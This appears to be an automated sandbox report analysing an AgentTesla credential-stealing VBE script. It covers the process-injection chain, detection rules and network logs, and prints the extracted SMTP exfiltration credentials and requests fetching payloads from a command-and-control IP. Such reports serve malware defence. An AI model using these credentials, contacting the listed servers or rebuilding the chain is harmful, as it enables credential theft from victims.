Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
009.vbe

Overview

General Information

Sample name:009.vbe
Analysis ID:1590535
MD5:9ff77002fbcbdd6e749722541b423034
SHA1:ea5ff219e2dde3cc57a1668ff0526be5b84e1250
SHA256:5b3b169b48056c1cd8b84093c312de2f9ec1c7a1edcd7591743f6eac62c98ab9
Tags:vbeuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4656 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7348 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7784 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7836 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • wermgr.exe (PID: 7328 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.MSBuild.exe.1000000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                15.2.MSBuild.exe.1000000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  15.2.MSBuild.exe.1000000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_7836.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xc55f:$e4: Get-WmiObject
                  • 0xc74e:$e4: Get-Process
                  • 0xc7a6:$e4: Start-Process

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: MSBuild connects to smtp port
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49972

                  System Summary

                  barindex
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4656, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.26.12.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49970
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", ProcessId: 4656, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper - File
                  Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4656, TargetFilename: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4656, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", ProcessId: 4656, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7784, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 7836, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-14T08:47:05.827514+010020301711A Network Trojan was detected192.168.2.749972162.254.34.31587TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 15.2.MSBuild.exe.1000000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49970 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49972 -> 162.254.34.31:587
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.7:49972 -> 162.254.34.31:587
                  Source: Joe Sandbox ViewIP Address: 144.91.79.54 144.91.79.54
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                  Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.7:49972 -> 162.254.34.31:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2412/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2412/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54
                  Source: wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1298744247.000001B4FC015000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300122294.000001B4FC01B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297980853.000001B4FC00F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297309774.000001B4FBFF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                  Source: wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/cn
                  Source: wscript.exe, 00000000.00000003.1297309774.000001B4FBFF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296199617.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296279117.000001B4FBFF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296973299.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtU?E
                  Source: wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/file
                  Source: wscript.exe, 00000000.00000003.1277534356.000001B4FBFA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r
                  Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r&s
                  Source: wscript.exe, 00000000.00000003.1273950809.000001B4FBFDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r4C
                  Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/s
                  Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/sX
                  Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/ssceg
                  Source: wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/v
                  Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/412/r
                  Source: wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/6s
                  Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/Zs
                  Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/rs
                  Source: wscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt
                  Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/sPH
                  Source: wscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/v
                  Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.bd060
                  Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49970 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi64_7836.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
